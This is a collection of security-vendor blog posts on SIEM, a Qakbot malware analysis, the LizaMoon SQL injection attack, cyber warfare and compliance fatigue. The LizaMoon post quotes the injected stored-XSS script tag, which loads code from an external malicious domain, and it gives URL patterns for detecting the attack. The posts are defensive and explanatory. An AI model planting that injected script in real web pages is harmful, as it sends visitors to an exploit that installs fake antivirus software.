Posts tagged: 'information security'
The following posts are associated with the tag you have selected. You may subscribe to the RSS feed for this tag to receive future updates relevant to the topic(s) of your interest.http://blog.logrhythm.com/tags/information-security/feed
Ten years ago, I was put into the position of having to figure how to manage a serious gap in enterprise security for a vitally sensitive environment. The problem was introduced to me like this: “The team can read 3,000 pages of logs per day but they receive 55,000 pages.” Adding more heads to the problem wasn’t the right solution- they were losing context, were inaccurate, under-trained, and bored. The success stories from this team were few and the needle-in-a-haystack factor was high. This process needed to be automated.
There was another serious problem besides log volume. I explained the systemic issues to my supervisors like this; “The security controls in our organization are like musical instruments in an orchestra. We have firewalls, anti-virus, intrusion detection devices, file integrity monitoring, content filters, anti-spam, host security, and application security. But right now each does security ‘solo’.”
Each control was managed by a different group. Reporting was all hand constructed and carried to the security team. The firewall manager would deliver the firewall report daily, intrusion detection was handled by the incident handling team once a week, anti-virus reports were delivered monthly by the IT staff, and so on.
The whole of the system was as reliable as clockwork: each piece did its part exactly as planned and yet each was still ineffective. The whole process was too high-level to determine if a problem existed, too low-level to see the problem as it happened, incomplete because not all data was reviewed, and lacked the context to determine if a threat was real even if it was suspected.
The bottom line? All controls play a different piece in the same symphony. They need to work together to turn noise into music.
The promise of SIEM was that computers can solve large, complex and tedious problems faster and more accurately than people; as such they are the ideal tool to police themselves and their users. We wanted the entire system of security controls in the enterprise working cooperatively, in harmony, and armed with the intelligence needed to protect the organization.
The emerging SIEM (SIM, SEM, or ‘master console’) technology was often focused on specific tools such as Intrusion Detection or Host Security that ‘extended’ into logging. Many critical systems had no logging whatsoever and companies withheld such features in an attempt to keep their proprietary systems closed. It would take most of the 2000′s to get the message to vendors that 3rd party auditing was a requirement. Now SIEMs can be practical and more creative means of using them can be applied.
Once the orchestra is together, the Conductor can lead. It’s of utmost importance that the managers, investigators, analysts, engineers and operators hear the same song. What SIEM needed and has achieved today the ability to connect logs to organizational regulations, policy, plan, procedures, organizational divisions, and even by individual project requirements. Alerts can be tailored to correlate between identified events, known threats, and critical assets. Reports can be automated and customized to fit any manner of output requirements rather than being limited hand-made spreadsheets. And valuable metrics can be mined from the official record of events that the SIEM establishes.
Thanks to SIEM technology, logs can be reviewed properly, human resource requirements to review them are less, and can handle volumes that now may exceed tens-of-millions of pages of data per day rather than just 55,000. Coverage now extends to the entire networked enterprise and information can be presented in a timely manner and in ways that are useful to all stakeholders. There is no doubt to me, SIEMs are a key innovation for information technology and will be critical for what is shaping up to be a brutal future for security problems.
While the recent Hartford Insurance breach, the subject of an earlier post by Dave Pack, didn’t make a lot of noise, it’s interesting to see an old piece of Malware (first discovered in 2007) like Qakbot still making its rounds in 2011. There are a number of things about this malware that make it particularly interesting.
Although certain Trojans like Zeus that target banking credentials are put up for sale on the black market as crimeware kits, Qakbot does not seem to follow this pattern. While many kinds of Trojans take a more blanket approach to stealing data and passwords, Qakbot is actually designed to differentiate between the data stolen from target devices and other passwords it may have collected on non target machines. Another interesting behavior of the Qakbot is that it also acts as a worm in its attempts to spread via network shares. While this combination of worm/Trojan behavior is not unique, it certainly makes it more dangerous. And if that isn’t enough, Qakbot reportedly employs up to 7 different methods to ensure that it’s not being reverse engineered by security researchers.
Evidence points to the idea that there is a dedicated group of people behind this piece of crimeware. If that’s true, it seems logical that The Hartford Insurance Company will not be the last business to be targeted by the Qakbot.
With that being said, let’s take a look at what a typical Qakbot infection looks like.
First, the Trojan is VMware and if it detects that it’s being run on a VMware virtual machine it will simply not run. Once running however, a dump of the file’s strings from memory gives us quite a bit of insight into what the file will try to do. Evidence of the file’s attempts to thwart security researchers’ attempts can be seen in various places.
Here it checks for the presence of various .exes running:
And here’s another check:
Here we see references to URLs where stolen data will be dumped. Notice the DNS query?
Some information on the data it will be sending out including the version of qbot (qakbot) running:
Out bound IRC traffic:
Based on what we’ve seen in the strings, we can expect to see a variety of logged behavior generated by the Qakbot. Monitoring for unexpected outbound FTP, IRC and port 80 traffic is one way to identify potential Qakbot activity. Also, a shared folder on the network that’s designed to always be empty can be monitored for the presence of new files to capture worm-like behavior.
If you want to know more about how we can help you detect malware with log data, feel free to
While I will be posting a more in-depth analysis of the LizaMoon attack, here are a few early thoughts from Dave Pack while his blogger profile gets set up. Dave manages LogRhythm’s Knowledge Engineering department and has been working in information security and advanced data analysis for over ten years.
Various security organizations/bloggers are tracking a mass SQL Injection currently being called “LizaMoon” (one of the first websites identified). While we haven’t a chance to fully analyze the attack, based on information being aggregated by SANS and Stackoverflow, it looks like this is a combination SQL Injection/Stored XSS Attack, the final target being client-side end-users.
It appears that the SQL Injection is taking advantage of a web application vulnerability. The injection itself is delivering a Stored XSS attack to the vulnerably web servers, consisting of a script (< / title> < script src = http : // google-stats49.info/ur.php >) that redirects unlucky internet users to a different site hosting a file named ur.php. This php file is where the dirty work is actually done. It launches an exploit which installs fake AV software on the end-user’s machine.
What’s really interesting is that the SQL injection is really just a means of delivering the much more dangerous Stored XSS to vulnerable web servers. Stored XSS are much scarier than a standard Reflected XSS because a user doesn’t have to be tricked into clicking a maliciously crafted URL. The XSS attack is simply sitting on the web server, waiting for any unlucky internet user to browse to the compromised website.
We’re attempting to get our hands on the ur.php code for further analysis of the client-side exploit, after which one of our analysts will be posting an update. In the meantime, here are some things both web administrators and end users can do to detect this attack and help protect against it.
1. Implement standard protections, such as sanitizing all database inputs and using parameterized queries across the board, to limit what can get through.
2. Check if a web server is being targeted by most types of SQL injections.
a. In particular, look at your access logs for “)-” in the URL. It is extremely rare for legitimate input to be commenting out the rest of a SQL statement.
b. Check for various encodings of the same string as well. LogRhythm provides an out-of-the-box AI Engine advanced correlation rule that looks for these strings in a URL and will alarm on any injection attempts.
1. If the functionality is available in your infrastructure, block any attempts to access a website with “ur.php” in the URL.
The last year has been full of stunning news about cyber security, and you’ve probably read about cyber incidents such as HBGary’s hack by Anonymous, the Stuxnet worm, and what looks like a back-and-forth cyber battle between China and the United States (read about these events here, here, here, and here.) These events have become a media circus simply because they all add up to ‘really bad news’ for workers in information technology and information security.
As more information is released about how useful cyber warfare is, or perceived to be (such as Wikileaks’ UN Diplomatic Cables), the more it inspires other countries to create their own cyber warfare capabilities (and here, and here, and even limiting summit talks here).
Backtracking the growth of cyber security over the last 30 years, the main goal has been to stop criminal hackers, disgruntled employees and malicious software. What happens if your organization becomes the target of a military mission? At least 45,000 computers were infected by Stuxnet and now there’s a possibility of your organization becoming the victim of collateral damage as cyber war proliferates.
The Internet isn’t a very good battleground for military warfare, though. In terrestrial warfare, bombs explode destroying the technology involved in functioning of advanced weaponry. Cyber-weapons, on the other hand, are like dropping Rosetta Stones on enemies. All the “zero-day exploits”, obfuscation techniques, tools and control methods are exposed and can be reverse engineered. Those capabilities can be added to the opponent’s arsenal and apparently there are personal safety risks by being involved.
It’s also of great value to be invisible while performing cyber warfare in order to avoid incident. Anonymity techniques can be less than magic and still be very effective; and in many cases can be conducted by contractors and/or non-affiliated hackers. Organizations that maintain a public Internet presence are at a huge disadvantage to these ambushing anonymous aggressors.
Organizations should take cyber warfare very seriously as the latest evolution of computer security. For the next decade or more, companies will hire tens-of-thousands of cyber security experts who will be expected to do no less than keep government sponsored hackers out of their networks.
Proper planning, enforcing security policy and improving situational awareness will be critical for handling the next wave of government funded cyber threats. Access control, usage monitoring, security auditing, vulnerability management, role separation and network segmentation will need to be considered and implemented for all IT projects. SIEM solutions and other security tools will become even more critical to maintaining an up-to-date security posture.
Are you ready for the security risks of the next decade?
He’s having the worst day of his life… over and over again.’
Ring any bells? It’s the strap line from the film Groundhog Day which sees Bill Murray’s character, Phil Connors, caught in a time warp – repeatedly waking up to find that things are exactly the same as the day before.
The film charts Connors’ frustration at being faced with the same situations every single day and seemingly unable to start the next day afresh.
Whether it’s travelling the same daily commute, or having repeated discussions about the latest information security regulation directive, I’m sure we’ve all related to that character at some point. Particularly if you are a miserable old curmudgeon like me (in fact I think you will find that Bill Murray based his screen persona on yours truly….)
With a seemingly endless list of new or amended regulations being introduced, it’s no wonder that IT security professionals can often feel like they’re stuck in their own Groundhog Day. No sooner does an organisation achieve compliance for one regulation, than another comes along, often bringing with it a sense of déjà vu for all involved.
Take the Payment Card Industry Data Security Standard for example. The first standard was introduced in December 2004, with the most recent revision in 2008, and an updated version due this October. As such, the regulation seems to have been around for an eternity and it’s no wonder that mentioning the subject will trigger a glazed response from many in the industry.
This rings even more true in the public sector where there seems to be a never ending stream of new initiatives and guidelines relating to information management and technology infrastructures. In the UK alone, organisations are faced with, for example, GSI/GCSX, CoCo compliance and latterly Memo 22 replacement, Good Practice Guide 13 (GPG 13.)
Information security is an ever changing beast. As technology evolves, so do the risks posed which is why it’s imperative that organisations -public and private – don’t become complacent when it comes to compliance.
As Bill Murray found in Groundhog Day, the only way to escape the monotony of his time warp was to re-assess his attitude to life. Of course I’m not suggesting for one minute that we turn our lives upside down, but there’s a lot to be said for taking a proactive approach when it comes to guarding against risk.
In every information security related regulation, there’s a requirement in some shape or form to protect the information being held by the organisation – from credit card details to children at risk records. Despite this, all too often security incidents are discovered after the event, once the damage has been done.
Protective Monitoring tools such as LogRhythm’s bring a new proactive dimension to information security-fulfilling multiple compliance requirements in the process. By centralising and automating how log data is managed, organisations can gain a clear insight into network and user behaviour. Any irregular activity is automatically flagged in real-time while reporting for compliance purposes is simpler and less time consuming.
As with most Hollywood films, Bill Murray’s ultimate goal was to get the girl. While I can’t guarantee that LogRhythm will bring similar results, it will help ease the Groundhog Day frustrations for those facing the continued compliance struggle.
Unless you’re happy living in Punxsutawney of course….